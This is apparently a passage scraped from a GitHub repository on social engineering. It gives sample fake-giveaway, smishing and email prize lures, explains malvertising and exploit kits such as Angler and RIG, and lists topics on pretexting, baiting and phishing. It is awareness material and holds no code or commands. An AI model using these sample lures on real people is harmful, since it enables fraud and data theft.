  “🎉 Win a FREE iPhone! 🎉 Just follow me, like this post, and tag 3 friends! 🎁 Link in bio! 🚨”
- What Happens: Victims click the link in the bio, which directs them to a fake page asking for personal information like name, email address, and shipping details.
- Outcome: Victims are never contacted about the prize, and their data is harvested for further exploitation.
Fake Giveaway via Email:
- Scenario: A message appears in your inbox, saying “Congratulations! You’ve won a $500 Amazon gift card! Click here to claim your prize!”
- What Happens: Clicking the link leads to a page asking for personal data or payment information for “shipping fees.”
- Outcome: Victim’s credit card details are stolen or the email address is added to a phishing list.
Smishing (Fake Contest via SMS):
- Scenario: A text message reads:
  “Congrats! You’ve won a free iPhone X! Click here to claim your prize NOW – limited time offer.”
- What Happens: The victim clicks the link, which leads to a page where they’re asked to enter personal details to receive the prize.
- Outcome: Victim’s data is stolen or malware is installed on their phone.
Fake Contest Form on a Popular Website:
- Scenario: A popup on a well-known site reads:
  “Hurry! You’re the 1,000th visitor! Win a brand-new iPhone 14, fill out this short form to claim it.”
- What Happens: The form asks for name, phone number, and email address, after which the victim is told to share with friends for a greater chance of winning.
- Outcome: Victim’s data is collected and sold to third parties.

Why It Works:

Greed and FOMO: Victims are tempted by the possibility of winning valuable prizes.
Urgency: Attackers often create a sense of urgency to push the victim into acting quickly.
Social Proof: Seeing others participate or winning can lead to greater trust in the scam.

Malicious Advertisements (Malvertising)

Malvertising is the practice of using online advertisements to distribute malicious software, often by redirecting users to exploit kits or other malicious websites. These ads can appear on trusted websites and are often delivered through ad networks, making it difficult to distinguish between legitimate ads and harmful ones.

How Malvertising Works

Ad Placement: Malicious actors inject harmful code into legitimate advertising networks. Once added, these ads are served on popular websites without the website owner's knowledge.
Exploitation: When a user interacts with an ad (by clicking or even just viewing it), it can trigger an exploit kit or malware downloader that attempts to exploit vulnerabilities in the user's system.
Exploit Kits: Exploit kits like Angler, RIG, or Sundown are often used in malvertising attacks. These kits look for vulnerabilities in the user's browser, plugins, or operating system, and try to deliver a malicious payload if a vulnerability is found.
Types of Malware Delivered:
- Ransomware (e.g., CryptoLocker)
- Spyware or keyloggers
- Trojans for remote access
- Cryptominers

Examples of Malvertising

Example 1: Fake Adobe Flash Update (Redirect to Malware)

Scenario: A user visits a trusted news site or social media platform. A pop-up or banner ad appears offering a "free Adobe Flash Player update". When clicked, it redirects the user to a fake Adobe website, asking to download the update.
Outcome: This update is actually malware, and once downloaded, it installs ransomware or a backdoor Trojan onto the user's system.

Example 2: Drive-By Downloads via Malvertising (Exploit Kit)

Scenario: A legitimate website shows a banner ad with a disguised JavaScript redirect. The user does not need to click the ad; simply viewing it triggers a redirect to a site hosting an exploit kit.
Outcome: The exploit kit scans the user's browser and plugins for vulnerabilities. If a vulnerability is found, it silently installs banking Trojans (e.g., Emotet) or ransomware.

Example 3: Fake Software Download Ads

Scenario: A user encounters an ad for a "Free Video Downloader" on a popular video streaming website. Clicking the ad leads to a site that looks like it offers free software downloads.
Outcome: The downloaded software is actually a malicious trojan or adware that gathers personal information or floods the system with unwanted ads.

Real-World Example: Simda Malvertising Campaign

The Simda malware campaign (2014) used malvertising through compromised ads on legitimate ad networks. Users who clicked or simply viewed infected ads were redirected to an exploit kit that installed the Simda botnet on their systems.

Name		Name	Last commit message	Last commit date
Latest commit History 17 Commits
LICENSE		LICENSE
README.md		README.md

License

yogsec/cybersecurity-social-engineering

Folders and files

Latest commit

History

Repository files navigation

Social Engineering Examples

🧠 Pretexting – Fake Identity Used to Gain Trust

📌 Description:

🧪 Common Examples of Pretexting:

1. Fake IT Support

2. HR or Recruitment Scam

3. Bank Impersonation

4. Journalist or Researcher

5. Fake Delivery or Maintenance Worker

6. Executive or Manager Spoof

7. Fake Law Enforcement or Government Agent

🎣 Baiting – Social Engineering Technique

💼 Real-World Examples of Baiting

🔌 1. Infected USB in Parking Lot

💰 2. Fake Job Offer File

🎮 3. Free Gaming Cheats or Cracks

💾 4. Free Movie Leak or Celebrity Content

💻 5. Infected Public Charging Station (Juice Jacking)

🧲 6. Online Giveaway Page

📁 7. File-Sharing Platform Trap

🛡️ Prevention Tips:

Quid Pro Quo – Exchange-Based Manipulation

⚙️ How It Works

💡 Examples of Quid Pro Quo Attacks

1. Fake Tech Support Offering Help in Exchange for Access

2. Fake Job Offer for Personal Information

3. Free Software in Exchange for Login Credentials

4. Free Wi-Fi Access in Exchange for Login Information

5. Free Malware Removal in Exchange for System Access

Authority Exploitation

Common Authority Exploitation Scenarios

1.1 Impersonating Law Enforcement

1.2 Impersonating a Senior Manager or Executive (CEO Fraud)

1.3 Impersonating a System Administrator

1.4 Impersonating a Vendor or Partner

1.5 Impersonating a Compliance Officer

Urgency Creation – “Act Fast or Lose Access!” Style Pressure

1. Phishing Email with Account Lock Threat

2. Fake Bank Alert - Immediate Action Required

3. Ransomware Threat

4. Urgent Update Required - Fake Software Update

5. Fake Lottery Win – Claim Your Prize Now!

6. Security Breach - Change Password Immediately

7. Tech Support Scam – Immediate Fix Required

8. Fake Subscription Renewal

Fear Tactics – Scaring Users into Acting

1. Account Lock/Deactivation Warning

2. Fake Legal Threats

3. Ransomware Scare

4. Fake Tech Support Scams

5. Financial Loss/Identity Theft Warnings

6. Cyber Attack/Threat Warning

7. Fake Emergency or Family Crisis

📚 Greed Triggers – “Win $1,000 Now!” Lures

1. Fake Prize Draws

2. Fake Investment Opportunities

3. "Limited Time" Offers on Fake E-commerce Sites

4. Fake Charity Donations

5. Fake Job Offers/Recruitment

Phishing – Generic Fake Emails

Examples of Phishing Emails:

Example 1: Fake Bank Alert

Example 2: Fake Shipping Notification

Example 3: Fake Account Verification

Example 4: Fake Invoice Notification

Example 5: Fake Social Media Login

Example 6: Fake Tech Support Alert

Example 7: Fake Prize Notification

Spear Phishing: Targeted, Personalized Emails

🎯 Key Characteristics of Spear Phishing:

📧 Examples of Spear Phishing Emails

1. Example: HR-related Attack

2. Example: CEO Fraud

3. Example: IT Department Impersonation